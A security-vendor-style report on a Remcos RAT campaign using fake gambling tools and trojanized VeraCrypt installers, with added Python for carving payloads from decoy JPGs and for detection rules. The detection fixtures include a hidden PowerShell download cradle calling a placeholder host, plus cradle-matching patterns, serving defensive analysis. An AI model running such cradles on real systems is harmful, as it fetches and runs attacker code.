Remcos RAT Campaign Uses Trojanized VeraCrypt Installers to Steal Credentials

AhnLab Security Intelligence Center (ASEC) has identified an active Remcos RAT campaign targeting users in South Korea.

The malware is being spread through multiple channels. It often masquerades as VeraCrypt utilities or tools used within illegal online gambling ecosystems.

Once installed, the RAT can steal login credentials, monitor user activity, and give attackers remote control over compromised systems.

In the first infection scenario, the malware is disguised as a “Blocklist User DB Lookup *****Club” program. In illegal gambling circles, “Blocklist user” typically refers to accounts that have been restricted or flagged due to suspicious or unwanted activity.

The program’s GUI pretends to look up these restricted accounts in a remote database; the “database” it contacts is in fact the command-and-control (C2) server.

The malware has been distributed through web browsers and Telegram using filenames such as:

Distribution Path
%USERPROFILE%\downloads\programs\*****usercon.exe
%USERPROFILE%\downloads\telegram desktop\*****usercon.exe
%USERPROFILE%\downloads\programs\blackusernon.exe

These names, along with GUI strings like “*****Club,” strongly suggest that the malware is being spread as a supposed “blocklist user lookup” tool for operators or users of illegal sports‑betting and casino sites.

Although the exact websites used for initial distribution are not yet known, the thematic alignment with gambling tooling indicates a focused targeting of this underground ecosystem.

The fake lookup program’s login function is non‑operational, serving mainly as a decoy. Internally, the executable contains two malicious VBS scripts embedded in its resource section.


VBS malware included in the resource (Source – ASEC).

When the program runs, these scripts are written to the %TEMP% directory under randomized filenames and then executed, silently starting the infection chain in the background.

A second variant impersonates a VeraCrypt utility installer and is delivered as installer.exe. This sample is packed as a 7z self‑extracting (SFX) archive and similarly includes a malicious VBS script.

By abusing VeraCrypt’s reputation as a legitimate disk‑encryption tool, the attackers raise the odds that ordinary users will trust and run the installer, extending the campaign’s reach beyond gambling‑related targets.

The attack chain relies on multiple scripted stages, heavy obfuscation, and misleading file extensions to evade analysis and detection. The stages observed include:

Stage  Type                   Name/Example
1      Installer              Fake DB tool / VeraCrypt
2      VBS downloader         %TEMP%\[Random].vbs
3      VBS dropper            XX12.JPG
4      VBS downloader         Config.vbs
5      VBS downloader         L1k9.JPG
6      PowerShell downloader  NMA1.JPG
7      Injector               XIN_PHOTO.JPG
8      Remcos RAT payload     Aw21.JPG

The threat actor embeds Base64‑encoded PE payloads inside files that pretend to be JPG images, placing the payload between separator strings and surrounding it with dummy comments and junk data.
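The decoy-image layout described above lends itself to a small carver. What follows is an added example, not ASEC’s tooling or anything recovered from the campaign: it treats a downloaded “.JPG” as suspect when it lacks the JPEG SOI marker, then pulls out any Base64 run that decodes to an MZ/PE image, trying the separator‑delimited regions first and falling back to a whole‑file scan. The separator token, the junk layout and the stub PE are constructed assumptions; the article does not disclose the real separator strings.

```python
"""
Carve Base64-encoded PE payloads out of a fake ".JPG" stage file.

Added example, not ASEC's tooling. The separator token, the junk layout and
the stub PE below are constructed for the demo; the article only says the
payload sits between separator strings surrounded by dummy comments and junk.
"""
import base64
import binascii
import re
import struct
from typing import List, Optional

SEPARATOR = b"<<<DATA>>>"                             # assumed token, not from the article
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")    # long Base64 run, optional padding
MZ_B64 = re.compile(rb"TV[o-r]")                      # 'MZ' + any byte, Base64-encoded


def looks_like_jpeg(data: bytes) -> bool:
    """A real JPEG starts with the SOI marker FF D8 FF; the decoy stages do not."""
    return data[:3] == b"\xff\xd8\xff"


def is_pe(data: bytes) -> bool:
    """MZ header plus an e_lfanew that points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _decode_from(run: bytes) -> Optional[bytes]:
    """Decode a Base64 run that starts at a group boundary, repairing the tail."""
    if len(run) % 4 == 1:          # a lone trailing char can never be valid
        run = run[:-1]
    run += b"=" * (-len(run) % 4)
    try:
        return base64.b64decode(run, validate=True)
    except (binascii.Error, ValueError):
        return None


def carve_payloads(blob: bytes, separator: bytes = SEPARATOR) -> List[bytes]:
    """Return every decoded PE found between separator tokens.

    If the separator is absent (or the operator changed it), fall back to
    scanning the whole blob; the MZ/PE check weeds out junk. Decoding starts
    at the Base64 form of 'MZ', so junk glued to the run cannot hide the header.
    """
    parts = blob.split(separator)
    candidates = parts[1::2] if len(parts) >= 3 else [blob]
    found = []
    for chunk in candidates:
        chunk = re.sub(rb"\s+", b"", chunk)           # Base64 may be line-wrapped
        for match in B64_RUN.finditer(chunk):
            run = match.group(0).rstrip(b"=")
            for start in (m.start() for m in MZ_B64.finditer(run)):
                decoded = _decode_from(run[start:])
                if decoded is not None and is_pe(decoded):
                    found.append(decoded)
                    break
    return found


def build_stub_pe() -> bytes:
    """Constructed 128-byte MZ/PE skeleton for the demo; not an executable."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)           # e_lfanew -> offset 0x40
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 60


STUB_B64 = base64.b64encode(build_stub_pe())

# Constructed decoy: comments and junk around one separator-delimited payload.
SAMPLE_FAKE_JPG = (
    b"/* image metadata */\r\n' dummy vbs comment '\r\n"
    + SEPARATOR + b"\r\n" + STUB_B64 + b"\r\n" + SEPARATOR + b"\r\n"
    + b"trailing junk 0123456789\r\n"
)


def triage(name: str, blob: bytes) -> dict:
    """Verdict for a downloaded 'image': is it a real JPEG, how many PEs inside?"""
    return {
        "name": name,
        "valid_jpeg": looks_like_jpeg(blob),
        "embedded_pe_count": len(carve_payloads(blob)),
    }


if __name__ == "__main__":
    print(triage("Aw21.JPG", SAMPLE_FAKE_JPG))
```

Starting the decode at the Base64 form of “MZ” (the characters “TV” followed by o, p, q or r) rather than at the start of the run is what makes the carver tolerant of junk glued directly onto the payload: such junk would otherwise either shift the four‑character group alignment or prefix the decoded bytes, and in both cases the MZ header would no longer sit at offset 0.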

After passing through five scripted stages, the chain ultimately drops and executes a .NET‑based injector.

This injector sends execution logs to the attacker via Discord Webhooks, then downloads the Remcos RAT payload from a URL provided as an argument.

It decrypts the payload and injects it into the legitimate AddInProcess32.exe process. Notably, this injector includes Korean‑language messages and strings that are uncommon in other known Remcos workflows, suggesting localization for South Korean victims.
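To turn the chain above into something a SOC can act on, here is an added example (my own toy rules, not ASEC’s detections) that evaluates constructed Sysmon‑style process‑creation events against three behaviours the article describes: a script host executing a randomly named .vbs from %TEMP%, a PowerShell download cradle fetching a URL with an image extension, and AddInProcess32.exe started by an unexpected parent. The event shape, the random‑name heuristic, the cradle keywords, the placeholder host and the parent allowlist are all assumptions made for the demo.

```python
"""
Toy detection logic for the stage chain, run over constructed process events.

Added example, not ASEC's rules. The event shape, the random-name heuristic,
the cradle keywords, the placeholder URL and the parent allowlist for
AddInProcess32.exe are assumptions made for this demo.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal Sysmon EID 1 / 4688-style record (constructed shape)."""
    image: str
    cmdline: str
    parent_image: str


# Script host running a randomly named .vbs dropped under %TEMP% (stage 2).
TEMP_VBS = re.compile(r"\\temp\\[a-z0-9]{6,}\.vbs\b", re.I)
# PowerShell pulling a URL whose "file" carries an image extension (stage 6).
IMAGE_URL = re.compile(r"https?://\S+\.jpe?g\b", re.I)
CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|\bcurl\b", re.I
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed allowlist: the .NET add-in host is normally spawned by Visual Studio.
LEGIT_ADDIN_PARENTS = {"devenv.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the names of every rule the event trips (empty list if clean)."""
    hits = []
    image = basename(ev.image)
    if image in SCRIPT_HOSTS and TEMP_VBS.search(ev.cmdline):
        hits.append("vbs_from_temp")
    if image in POWERSHELL and IMAGE_URL.search(ev.cmdline) and CRADLE.search(ev.cmdline):
        hits.append("ps_download_fake_image")
    if image == "addinprocess32.exe" and basename(ev.parent_image) not in LEGIT_ADDIN_PARENTS:
        hits.append("addinprocess32_unexpected_parent")
    return hits


def scan(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """(event index, hits) for every event that tripped at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev))]


# Constructed events mirroring the chain; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\AppData\Local\Temp\k3x9qv2p.vbs"',
              r"C:\Users\victim\Downloads\programs\installer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/XIN_PHOTO.JPG')\"",
              r"C:\Windows\System32\wscript.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
              "AddInProcess32.exe",
              r"C:\Users\victim\AppData\Local\Temp\injector.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",          # benign logon script
              r'"C:\Windows\System32\wscript.exe" "C:\Scripts\logon.vbs"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, basename(SAMPLE_EVENTS[index].image), hits)
```

Each rule on its own is noisy (administrators do run .vbs files, PowerShell does fetch images), so in practice these would be correlated along the parent chain, for example a script host whose parent is an installer from the Downloads folder followed within minutes by the AddInProcess32.exe hit on the same host.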

Remcos RAT Capabilities

Remcos RAT is a commercially sold remote administration tool that is frequently abused for malicious purposes. Once installed, it provides attackers with extensive control and data‑theft capabilities, including:

  • Remote command execution, file management, and process control.
  • Keylogging and clipboard monitoring.
  • Screenshot capture and surveillance via webcam and microphone.
  • Theft of stored credentials from web browsers and other applications.

The analyzed samples store their configuration inside an encrypted resource named “SETTINGS.” Once decrypted, this reveals the C2 servers and other parameters. Observed configurations include:

Settings of Remcos RAT (Source – ASEC).

Some variants pretend to be a “stock price ticker” and employ Korean strings in mutex names and registry keys.

In versions where offline keylogging is enabled, captured keystrokes are stored locally under %ALLUSERSPROFILE%\remcos\, further exposing victims’ login IDs, passwords, and other sensitive text input.

The campaign demonstrates that Remcos RAT operators are actively targeting South Korean users, with a particular focus on individuals involved in illegal online gambling.

At the same time, the use of bogus VeraCrypt installers shows that regular users can also be affected if they download tools from untrusted sources.

Because Remcos supports remote control, credential theft, keylogging, and complete user surveillance, an infection can lead to severe privacy violations, account takeover, and potential financial loss.

Users and organizations should avoid downloading software from unknown or unofficial sources, verify installers via checksums or trusted portals, and maintain up‑to‑date security solutions capable of detecting script‑based downloaders, obfuscated VBS/PowerShell, and RAT behavior.

Any system suspected of infection should be isolated, thoroughly scanned, and have all credentials changed immediately after remediation.
